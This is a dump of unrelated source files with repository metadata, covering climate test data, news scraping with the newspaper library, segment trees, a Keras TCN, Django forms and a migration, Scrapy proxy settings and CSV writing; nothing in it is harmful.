time_bnds[0] = (it-1)*30.;
time_bnds[1] = it*30.;
time[0]=it;
time_bnds[0] = it;
time_bnds[1] = it+1;
return time[0],numpy.array(time_bnds)
def read_3d_input_files(it, varname, n0, n1, n2, ntimes):
if varname=="CLOUD":
factor = 0.1;
offset = -50.;
elif varname=="U":
factor = 1.
offset = 100.
elif varname=="T":
factor = 0.5;
offset = -150.;
field = numpy.zeros((n2,n1,n0),dtype='d')
for k in range(n2):
for j in range(n1):
for i in range(n0):
field[k,j,i] = (k*64 + j*16 + i*4 + it)*factor - offset;
return field
def read_2d_input_files(it, varname, n0, n1):
if varname=="LATENT":
factor = 1.25;
offset = 100.;
elif varname == "TSURF":
factor = 2.0;
offset = -230.;
elif varname=="SOIL_WET":
factor = 10.;
offset = 0.;
elif varname == "PSURF":
factor = 1.;
offset = -9.7e2;
field = numpy.zeros((n0,n1),dtype='d')
for j in range(n0):
for i in range(n1):
tmp = (j*16. + i*4. + it)*factor - offset;
field[j,i] = tmp;
return field
alats, alons, plevs, bnds_lat, bnds_lon = read_coords(lon,lat,lev);
Time = numpy.zeros(ntimes,dtype='d')
bnds_time = numpy.zeros(ntimes*2,dtype='d')
Time[0],bnds_time[0:2] = read_time(0)
Time[1],bnds_time[2:4] = read_time(1)
zlevs = numpy.zeros(5,dtype='d')
zlevs[0]=0.1999999999999999999;
zlevs[1]= 0.3;
zlevs[2]=0.55;
zlevs[3]= 0.7;
zlevs[4] = 0.99999999;
zlev_bnds = numpy.zeros(6,dtype='d')
zlev_bnds[0] = 0.
zlev_bnds[1] = 0.2
zlev_bnds[2] = 0.42
zlev_bnds[3] = 0.62
zlev_bnds[4] = 0.8
zlev_bnds[5] = 1.
regions = numpy.array(["atlantic_arctic_ocean", "indian_pacific_ocean", "pacific_ocean", "global_ocean", "sf_bay"])
a_coeff=numpy.array([ 0.1, 0.2, 0.3, 0.22, 0.1 ])
b_coeff=numpy.array([ 0.0, 0.1, 0.2, 0.5, 0.8 ])
p0= numpy.array([1.e5,])
a_coeff_bnds=numpy.array([0.,.15, .25, .25, .16, 0.])
b_coeff_bnds=numpy.array([0.,.05, .15, .35, .65, 1.])
|
[
"doutriaux1@llnl.gov"
] |
doutriaux1@llnl.gov
|
252a5265eda2101371d397eb500378a31d787fa2
|
2e356d3be3eb83ef89317a7804e8fa4567898d6f
|
/chapter1/code/metadata/extract_articles.py
|
fca044b690428e12f7d91aeeee034f30287dd60e
|
[
"MIT"
] |
permissive
|
PacktPublishing/Advanced-Web-Scraping-with-Python
|
91069bbf925e142ee64e8c80ae97c28077def052
|
6624b71b2889a6fcfa3f080a6e15b979e582cce6
|
refs/heads/master
| 2021-07-09T10:29:35.394560
| 2021-01-21T07:12:34
| 2021-01-21T07:12:34
| 213,933,836
| 17
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import newspaper
cnn_paper = newspaper.build('http://cnn.com')
print('*****************************category urls************************************\n')
for category in cnn_paper.category_urls():
print(category)
print('*****************************url articles************************************\n')
for article in cnn_paper.articles:
print(article.url)
print('*****************************download first article************************************\n')
cnn_article = cnn_paper.articles[0]
cnn_article.download()
cnn_article.parse()
#print(cnn_article.html)
print(cnn_article.text)
print(cnn_article.keywords)
print(cnn_article.summary)
print(cnn_article.authors)
print(cnn_article.publish_date)
|
[
"jose-manuel.ortega-candel@capgemini.com"
] |
jose-manuel.ortega-candel@capgemini.com
|
940e980bebc322bec60c56ff452cc02f1fa66e97
|
f9033131dc4d66ede2c5c22fcaa4a0be5b682152
|
/SegmentTrees/Tasks/eolymp(2941).py
|
3ebde2e3290bba8960436b76b06836cf33e41562
|
[] |
no_license
|
Invalid-coder/Data-Structures-and-algorithms
|
9bd755ce3d4eb11e605480db53302096c9874364
|
42c6eb8656e85b76f1c0043dcddc9c526ae12ba1
|
refs/heads/main
| 2023-04-29T08:40:34.661184
| 2021-05-19T10:57:37
| 2021-05-19T10:57:37
| 301,458,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,112
|
py
|
#https://www.e-olymp.com/uk/submissions/7648758
from math import log2, ceil
class SegmentTree:
''' Дерево відрізків з операцією суми.'''
def __init__(self, array):
k = len(array)
n = 1 << ceil(log2(k))
self.items = n * [0] + array + (n - k) * [0]
for i in range(n - 1, 0, -1):
# Визначаємо навантаження предків
self.items[i] = self.items[i * 2] + self.items[i * 2 + 1]
self.size = n
def update(self, i, item):
''' Міняє елемент масиву на позиції i (початок з нуля) на item.'''
i += self.size
self.items[i] = item
while i != 1: # Поки не дійшли до кореня
i = i // 2 # Беремо номер батька
# Визначаємо його навантаження
self.items[i] = self.items[i * 2] + self.items[i * 2 + 1]
def sum(self, left, right):
''' Повертає суму елементів відрізка.'''
left += self.size
right += self.size
result = 0
while left <= right:
if left % 2 == 1: # Якщо правий син
result += self.items[left]
if right % 2 == 0: # Якщо лівий син
result += self.items[right]
left = (left + 1) // 2 # Беремо індекс батька вузла справа
right = (right - 1) // 2 # Беремо індекс батька вузла зліва
return result
if __name__ == '__main__':
with open('input.txt') as inp:
n, q = map(int, inp.readline().split())
array = list(map(int, inp.readline().split()))
tree = SegmentTree(array)
for _ in range(q):
command = inp.readline().split()
if command[0] == '=':
tree.update(int(command[1]) - 1, int(command[2]))
elif command[0] == '?':
print(tree.sum(int(command[1]) - 1, int(command[2]) - 1))
|
[
"gusevvovik@gmail.com"
] |
gusevvovik@gmail.com
|
311e5628fc15ce4639452642b0f5bc2cc980bb8d
|
b5ce6908490cfb8e6a1e1cbe4745d675122ddce0
|
/questions/single-element-in-a-sorted-array/Solution.py
|
3654674cf86e3e46733b7d40cc107476d78e5504
|
[
"MIT"
] |
permissive
|
franklingu/leetcode-solutions
|
8895910f13208e1d8e604100d84c2dd35684cde4
|
7ad7e5c1c040510b7b7bd225ed4297054464dbc6
|
refs/heads/master
| 2023-01-09T01:34:08.097518
| 2023-01-02T02:05:35
| 2023-01-02T02:05:35
| 43,345,677
| 155
| 66
|
MIT
| 2020-10-02T03:41:36
| 2015-09-29T04:54:38
|
Python
|
UTF-8
|
Python
| false
| false
| 839
|
py
|
"""
You are given a sorted array consisting of only integers where every element appears exactly twice, except for one element which appears exactly once. Find this single element that appears only once.
Follow up: Your solution should run in O(log n) time and O(1) space.
Example 1:
Input: nums = [1,1,2,3,3,4,4,8,8]
Output: 2
Example 2:
Input: nums = [3,3,7,7,10,11,11]
Output: 10
Constraints:
1 <= nums.length <= 10^5
0 <= nums[i] <= 10^5
"""
class Solution:
def singleNonDuplicate(self, nums: List[int]) -> int:
low = 0
high = len(nums) - 1
while low < high:
mid = (low + high)//2
if mid%2 ==0:
mid +=1
if nums[mid] == nums[mid - 1]:
low = mid + 1
else:
high = mid - 1
return nums[low]
|
[
"franklingujunchao@gmail.com"
] |
franklingujunchao@gmail.com
|
b6c5a444d53fac0f7a74a29f4133549428f0157a
|
c3a0d8cc1e386717dffd93d0eb58bec752e26b0a
|
/test787-keras_block/main.py
|
9503c190eb670d02b58aab4d7b06af569f387d96
|
[] |
no_license
|
matthiaswh/bit4
|
0ce0e385d889a30620426bc60aa47de0ecef21de
|
0633d7357d157b5f47c70091dc676dc2e06c1ae1
|
refs/heads/master
| 2022-11-10T07:44:28.706805
| 2020-06-21T13:12:26
| 2020-06-21T13:12:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,152
|
py
|
import keras
import keras.backend as K
import keras.layers as L
import numpy as np
from layers import LayerBlock, Module
# Weight regularization works but batch normalization does not work!
def main():
tcn = TCN(10, kernel_size=5, dilation_rates=[1, 2, 4, 8, 16])
model = keras.Sequential(
[
L.InputLayer((100, 2)),
tcn,
L.Dense(1, activation="sigmoid"),
]
)
model.summary()
model.compile(
loss="binary_crossentropy",
optimizer=keras.optimizers.Adam(0.01),
metrics=["accuracy", "binary_crossentropy"],
)
X = np.random.uniform(-1, 1, size=(5000, 100, 2))
a = np.mean(X[:, :50, 0] + X[:, 50:, 1], axis=1)
b = np.mean(X[:, :50, 1] + X[:, 50:, 0], axis=1)
y = a < b
model.fit(X, y, batch_size=100, epochs=10, validation_split=0.1)
class TCN(Module):
def __init__(self, encoding_dim, kernel_size, dilation_rates, **kwargs):
super().__init__(**kwargs)
self.frontend = L.Dense(encoding_dim, kernel_regularizer="l2", name="frontend")
self.tcn_steps = LayerBlock(name="steps")
for i, d in enumerate(dilation_rates):
step = LayerBlock(residual=True, name=f"step{i + 1}")
step.add(
L.Conv1D(
encoding_dim,
kernel_size,
dilation_rate=d,
padding="same",
activation="elu",
kernel_constraint=keras.constraints.MaxNorm(1),
)
)
self.tcn_steps.add(step)
self.pool = L.GlobalAveragePooling1D(name="pool")
def build(self, input_shape):
self.frontend.build(input_shape)
encoding_shape = self.frontend.compute_output_shape(input_shape)
self.tcn_steps.build(encoding_shape)
self.pool.build(encoding_shape)
super().build(input_shape)
def compute_output_shape(self, input_shape):
return input_shape[0], self.frontend.units
def call(self, x):
return self.pool(self.tcn_steps(self.frontend(x)))
if __name__ == "__main__":
main()
|
[
"snsinfu@gmail.com"
] |
snsinfu@gmail.com
|
3936237e41a796d8b7cea9c0aef0a060bba62c82
|
97d5efaf0e15c537d4380ae3b61b88ee3d8e84ab
|
/MiSeguroVirtualBackend/insurances/migrations/0013_userpolicy_adviser_cellphone.py
|
01562d2fd74b1024f2331ea628035c909f6ab024
|
[] |
no_license
|
dmontoya1/mi-seguro-virtual
|
af49f0d4492264cea23b6d50a2a2b27c9816e843
|
6e14fb5e38b3a7192e532a46b842d6a2f80d5ea7
|
refs/heads/master
| 2023-05-06T07:43:16.335977
| 2019-04-03T17:57:32
| 2019-04-03T17:57:32
| 371,432,047
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 490
|
py
|
# Generated by Django 2.0.6 on 2018-12-18 03:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('insurances', '0012_auto_20181206_2028'),
]
operations = [
migrations.AddField(
model_name='userpolicy',
name='adviser_cellphone',
field=models.CharField(blank=True, help_text='Agregar en caso de que aplique', max_length=255, verbose_name='Celular asesor'),
),
]
|
[
"dmontoya@apptitud.com.co"
] |
dmontoya@apptitud.com.co
|
5bbb725cb6a7f41b724a108f31fc041271cc5ebc
|
41ea088695ed956ef8c6e34ace4d8ab19c8b4352
|
/XDG_CACHE_HOME/Microsoft/Python Language Server/stubs.v1/ebnjyiNMGOHuosJ_EE7SGKALWfhDqU3P4hGf55ouVTM=/_sparsetools.cpython-37m-x86_64-linux-gnu.pyi
|
d5f00fb6c5fb347fd16db47ae3c4ea852c2c1bd8
|
[] |
no_license
|
ljbelenky/decline
|
d5c1d57fd927fa6a8ea99c1e08fedbeb83170d01
|
432ef82a68168e4ac8635a9386af2aa26cd73eef
|
refs/heads/master
| 2021-06-18T17:01:46.969491
| 2021-04-26T18:34:55
| 2021-04-26T18:34:55
| 195,559,200
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,625
|
pyi
|
__doc__ = None
__file__ = '/home/land/.local/lib/python3.7/site-packages/scipy/sparse/_sparsetools.cpython-37m-x86_64-linux-gnu.so'
__name__ = 'scipy.sparse._sparsetools'
__package__ = 'scipy.sparse'
def bsr_diagonal():
pass
def bsr_eldiv_bsr():
pass
def bsr_elmul_bsr():
pass
def bsr_ge_bsr():
pass
def bsr_gt_bsr():
pass
def bsr_le_bsr():
pass
def bsr_lt_bsr():
pass
def bsr_matmat_pass2():
pass
def bsr_matvec():
pass
def bsr_matvecs():
pass
def bsr_maximum_bsr():
pass
def bsr_minimum_bsr():
pass
def bsr_minus_bsr():
pass
def bsr_ne_bsr():
pass
def bsr_plus_bsr():
pass
def bsr_scale_columns():
pass
def bsr_scale_rows():
pass
def bsr_sort_indices():
pass
def bsr_tocsr():
pass
def bsr_transpose():
pass
def coo_matvec():
pass
def coo_tocsr():
pass
def coo_todense():
pass
def cs_graph_components():
pass
def csc_diagonal():
pass
def csc_eldiv_csc():
pass
def csc_elmul_csc():
pass
def csc_ge_csc():
pass
def csc_gt_csc():
pass
def csc_le_csc():
pass
def csc_lt_csc():
pass
def csc_matmat_pass1():
pass
def csc_matmat_pass2():
pass
def csc_matvec():
pass
def csc_matvecs():
pass
def csc_maximum_csc():
pass
def csc_minimum_csc():
pass
def csc_minus_csc():
pass
def csc_ne_csc():
pass
def csc_plus_csc():
pass
def csc_tocsr():
pass
def csr_column_index1():
pass
def csr_column_index2():
pass
def csr_count_blocks():
pass
def csr_diagonal():
pass
def csr_eldiv_csr():
pass
def csr_eliminate_zeros():
pass
def csr_elmul_csr():
pass
def csr_ge_csr():
pass
def csr_gt_csr():
pass
def csr_has_canonical_format():
pass
def csr_has_sorted_indices():
pass
def csr_le_csr():
pass
def csr_lt_csr():
pass
def csr_matmat_pass1():
pass
def csr_matmat_pass2():
pass
def csr_matvec():
pass
def csr_matvecs():
pass
def csr_maximum_csr():
pass
def csr_minimum_csr():
pass
def csr_minus_csr():
pass
def csr_ne_csr():
pass
def csr_plus_csr():
pass
def csr_row_index():
pass
def csr_row_slice():
pass
def csr_sample_offsets():
pass
def csr_sample_values():
pass
def csr_scale_columns():
pass
def csr_scale_rows():
pass
def csr_sort_indices():
pass
def csr_sum_duplicates():
pass
def csr_tobsr():
pass
def csr_tocsc():
pass
def csr_todense():
pass
def dia_matvec():
pass
def expandptr():
pass
def get_csr_submatrix():
pass
def test_throw_error():
pass
|
[
"ljbelenky@gmail.com"
] |
ljbelenky@gmail.com
|
4b1eb52decc3b5781a44abbeb0ef755e29c9aa0e
|
c84a561927ff9c6712e521c3448531f4992f41fb
|
/AlgorithmicHeights/INV/inv.py
|
7999bdddb37a864f597dba8e6627368d857f4743
|
[] |
no_license
|
Meng-Gen/rosalind
|
55c174005807d0fc8703e62f7358f4ed205f977d
|
3cf5e0ee1536e3e762ddd5354b8da4c8d378a640
|
refs/heads/master
| 2020-05-13T15:47:13.504360
| 2013-12-29T12:15:27
| 2013-12-29T12:15:27
| 15,453,371
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,579
|
py
|
import sys
def read_dataset():
lines = [line.strip() for line in sys.stdin.readlines()]
n = int(lines[0])
array = list(map(int, lines[1].split()))
assert(n == len(array))
return n, array
class CoutingInversionProblem():
def __init__(self, size, array):
self.size = size
self.array = [None] + array
def solve(self):
return self.count(1, self.size)
def count(self, left, right):
if left >= right:
return 0
middle = (left + right) // 2
return self.count(left, middle) + self.count(middle + 1, right) + self.merge(left, middle, right)
def merge(self, left, middle, right):
m = middle - left + 1
n = right - middle
L = [None] + self.array[left:middle+1]
R = [None] + self.array[middle+1:right+1]
rv = 0
i, j, k = 1, 1, left
while i <= m and j <= n:
if L[i] <= R[j]:
self.array[k] = L[i]
i += 1
rv += (j - 1)
else:
self.array[k] = R[j]
j += 1
k += 1
if i > m:
for y in range(j, n + 1):
self.array[middle + y] = R[y]
else:
for x in range(i, m + 1):
self.array[right - m + x] = L[x]
rv += (j - 1)*(m - i + 1)
return rv
def main():
n, array = read_dataset()
problem = CoutingInversionProblem(n, array)
print(problem.solve())
if __name__ == '__main__':
sys.exit(main())
|
[
"plover@gmail.com"
] |
plover@gmail.com
|
f955924de40322655374d0ebcb1737d4c9f84630
|
db0e8aa3a92a30c9b1cc8da03725e951ff64f3f1
|
/app1/forms.py
|
744896064b952f02b93b044a8985999dd061a2d9
|
[
"BSD-3-Clause"
] |
permissive
|
shrey-c/DataLeakageDjango
|
ffeef61caa347520747fc70cf3f7f8b84a9610cf
|
a827c5a09e5501921f9fb97b656755671238dd63
|
refs/heads/master
| 2022-11-30T03:30:12.313025
| 2020-07-12T06:47:44
| 2020-07-12T06:47:44
| 242,569,637
| 6
| 1
|
BSD-3-Clause
| 2022-11-22T05:20:22
| 2020-02-23T18:33:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,729
|
py
|
from django import forms
from app1.models import Document, DetectorUpload
class ChangepwdForm(forms.Form):
def __init__(self, *args, **kwargs):
super(ChangepwdForm, self).__init__(*args, **kwargs)
self.fields['current'].widget.attrs = {
'class' : 'form-control',
'placeholder' : 'Current Password'
}
self.fields['new'].widget.attrs = {
'class' : 'form-control',
'placeholder' : 'New Password'
}
self.fields['reenter'].widget.attrs = {
'class' : 'form-control',
'placeholder' : 'Re-enter Password'
}
current = forms.CharField(max_length=50, widget=forms.PasswordInput)
new = forms.CharField(max_length=50, widget=forms.PasswordInput)
reenter = forms.CharField(max_length=50, widget=forms.PasswordInput)
class DocumentForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(DocumentForm, self).__init__(*args, **kwargs)
self.fields['title'].widget.attrs = {
'class': 'form-control',
'placeholder': 'title'
}
self.fields['description'].widget.attrs = {
'class': 'form-control',
'placeholder': 'description'
}
self.fields['accesslevel'].widget.attrs = {
'class': 'form-control',
'placeholder': 'accesslevel',
}
title = forms.CharField(max_length=50)
description = forms.CharField(max_length=500)
accesslevel = forms.CharField(max_length=50)
document = forms.FileField()
class Meta:
model = Document
fields = ('title','description', 'accesslevel', 'document')
class DetectorUploadForm(forms.ModelForm):
document = forms.FileField()
class Meta:
model = DetectorUpload
fields = {'document'}
|
[
"shreyansh.chheda@gmail.com"
] |
shreyansh.chheda@gmail.com
|
a717be30c5eafe7027a31daef6d7c4b751ab3056
|
7ef2308e51d1d5700fbd092177ee15e2a03ebdd8
|
/WorkLean/Python/Scrapy/testCrawler1_0/testCrawler1_0/settings.py
|
9a35f942f04500c15cbc5e210353e021980e8568
|
[] |
no_license
|
STAWZW/STAWZW1.0
|
741002eb35c2883e5739fee8d14ff430e9622c01
|
a835ac27aba17f968116e321bd201b26c9fb3578
|
refs/heads/master
| 2020-07-21T20:21:59.753992
| 2019-09-26T09:21:28
| 2019-09-26T09:21:28
| 206,965,347
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,037
|
py
|
# -*- coding: utf-8 -*-
# import random
# Scrapy settings for testCrawler1_0 project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'testCrawler1_0'
SPIDER_MODULES = ['testCrawler1_0.spiders']
NEWSPIDER_MODULE = 'testCrawler1_0.spiders'
# 用户自定义代理库
# USER_AGENT_LIST = [
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
# "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
# "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
# "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
# "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
# "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
# "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
# "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
# ]
# USER_AGENT = random.choice(USER_AGENT_LIST) #每次运行爬虫会使用不同的用户代理,但每次运行中的请求都是不变的
# 用户自定义I代理P池
# 免费代理IP[西刺]是你的好选择!(手滑) 网址:https://www.xicidaili.com/wt
IPPOOL_LIST = [
{"ipaddr": "124.16.75.212:8080"},
{"ipaddr": "101.231.234.38:8080"},
{"ipaddr": "218.64.69.79:8080"},
{"ipaddr": "144.123.70.252:9999"},
{"ipaddr": "113.121.21.199:9999"},
{"ipaddr": "171.35.161.147:9999"},
{"ipaddr": "27.204.84.42:9999"},
]
# 是否服从 robots.txt 规则,服从为Teur,不服从为False,服从规则有些网站是爬取不到的
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'testCrawler1_0.middlewares.Testcrawler10SpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
# 'testCrawler1_0.middlewares.Testcrawler10DownloaderMiddleware': 543,
# 自定义IP代理池中间件,优先级要高于HttpProxyMiddleware中间件
'testCrawler1_0.middlewares.IPPOOLS': 747,
'scrapy.downloadermiddlewares.httpproxy.HttpProxyMiddleware': 748,
# 自定义用户代理池中间件,优先级要高于UserAgentMiddleware中间件
'testCrawler1_0.middlewares.USERAGENTS': 749,
'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': 750,
# 这里要替换为自己的项目名称,重写的优先级一定要高(数字仅代表优先级,数字越小,优先级越高)
'scrapy_splash.SplashCookiesMiddleware': 744,
'scrapy_splash.SplashMiddleware': 745,
'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 810,
}
HTTPCACHE_ENABLED = True
HTTPCACHE_EXPIRATION_SECS = 0
HTTPCACHE_DIR = 'httpcache'
SPLASH_URL = "http://192.168.99.100:8050/" # 自己安装的docker里的splash位置
DUPEFILTER_CLASS = "scrapy_splash.SplashAwareDupeFilter"
HTTPCACHE_STORAGE = 'scrapy_splash.SplashAwareFSCacheStorage'
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'testCrawler1_0.pipelines.Testcrawler10Pipeline': 201,
'testCrawler1_0.pipelines.Testcrawler10ImagePipeline': 200,
}
IMAGES_STORE = 'D:/GitRepository/STAWZW2.0/WorkLean/Python/Scrapy/core-scrapy-master/img/' # 图片存储路径
IMAGES_URLS_FIELD = "image_urls" # 对应item里面设定的字段,取到图片的url
IMAGES_RESULT_FIELD = "image_path"
# 30 days of delay for images expiration
IMAGES_EXPIRES = 30
# # 图片缩略图
# IMAGES_THUMBS = {
# 'small': (50, 50),
# 'big': (270, 270),
# }
# # 图片过滤器,最小高度和宽度
# IMAGES_MIN_HEIGHT = 110
# IMAGES_MIN_WIDTH = 110
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPERROR_ALLOWED_CODES ——> HTTP请求允许的错误:[code]
HTTPERROR_ALLOWED_CODES = [301]
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
# # 是否启用日志
# LOG_ENABLED=True
# # 日志使用的编码
# LOG_ENCODING='utf-8'
# # 日志文件(文件名)
# LOG_FILE='testScrapyLog.log'
# # 日志格式
# LOG_FORMAT='%(asctime)s [%(name)s] %(levelname)s: %(message)s'
# # 日志时间格式
# LOG_DATEFORMAT='%Y-%m-%d %H:%M:%S'
# # 日志级别 CRITICAL, ERROR, WARNING, INFO, DEBUG
# LOG_LEVEL='DEBUG'
# # 如果等于True,所有的标准输出(包括错误)都会重定向到日志,例如:print('hello')
# LOG_STDOUT=True
# # 如果等于True,日志仅仅包含根路径,False显示日志输出组件
# LOG_SHORT_NAMES=False
|
[
"1223868042@qq.com"
] |
1223868042@qq.com
|
b03811a2a5a5661848fbf370e6bba4eeb45fd36a
|
584e9c42e6240b9facc866703a6f26b06773df94
|
/TwilioSendGrid/stressful_subject.py
|
e3f8e396652697024e58f215a4cea54ffaf77bc9
|
[] |
no_license
|
anton-dovnar/checkio
|
48fbaf84c244b0fca7bed5cf7f34179cf850adf9
|
10aed757ec36f182871a03ed8c9e73319cc8824a
|
refs/heads/master
| 2023-03-24T16:23:39.524060
| 2021-03-12T13:07:04
| 2021-03-12T13:07:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 756
|
py
|
#!/home/fode4cun/.local/share/virtualenvs/checkio-ufRDicT7/bin/checkio --domain=py run stressful-subject
#
# END_DESC
import re
def is_stressful(subj):
"""
recognize stressful subject
"""
if subj.isupper() or subj.endswith('!!!'):
return True
patterns = [r'(\b[help\!\-\.]{4,}\b)', r'(\b[asap\!\-\.]{4,}\b)', r'(\b[urgent\!\-\.]{4,}\b)']
for pattern in patterns:
if re.search(pattern, subj, flags=re.IGNORECASE):
return True
return False
if __name__ == '__main__':
#These "asserts" are only for self-checking and not necessarily for auto-testing
assert is_stressful("Hi") == False, "First"
assert is_stressful("I neeed HELP") == True, "Second"
print('Done! Go Check it!')
|
[
"fode4cun@gmail.com"
] |
fode4cun@gmail.com
|
c6756abdb37e1f8b52dd5b35b3118afb8bc40f58
|
ab825ee0326e98d115b6dc02bbda02b302787d46
|
/応用編/41_csvファイルの読み書き/モジュール/01_CSVファイルの書き込み.py
|
bb00d85a58a09d9f502ac4e2f14bf4e26a8d34d9
|
[] |
no_license
|
holothuria/python_study
|
295dd7c30a566b5a9688b9196e25bf6e065401a0
|
7e98090e64d646d23a4189e0efd68c2905b78d04
|
refs/heads/master
| 2020-03-23T20:04:38.900368
| 2019-03-05T12:47:53
| 2019-03-05T12:47:53
| 142,019,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
import csv
csv_file = open('./python.csv', 'w', newline='')
writer = csv.writer(csv_file)
row = ('python', '-', 'izm', '1')
writer.writerow(row)
rows = []
rows.append(('python', '-', 'izm', '2'))
rows.append(('python', '-', 'izm', '3'))
rows.append(('p,y,t,h,o,n', '-', 'i,z,m', '4'))
writer.writerows(rows)
csv_file.close()
|
[
"umehara.daichi@withone.co.jp"
] |
umehara.daichi@withone.co.jp
|
992f5347a46a745fa991942a9bdb04ea5c918b52
|
b3d86713ed58e0b7fe3c1191324e36659c0d9d78
|
/DataScience/ch10/evaluation_data.py
|
94d29f7149b5f9ebae13989f4ba23eb44c469612
|
[] |
no_license
|
Kose-i/machine_learning_tutorial
|
3d6cb30a20d65c66aa6efcba0e693de75791507a
|
def223fecb459ad1a6e7f9f36b3d733a89efd378
|
refs/heads/master
| 2021-07-03T10:37:26.809388
| 2020-07-27T12:53:19
| 2020-07-27T12:53:19
| 174,057,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,989
|
py
|
import numpy as np
import numpy.random as random
import scipy as sp
from pandas import Series, DataFrame
import pandas as pd
import matplotlib.pyplot as plt
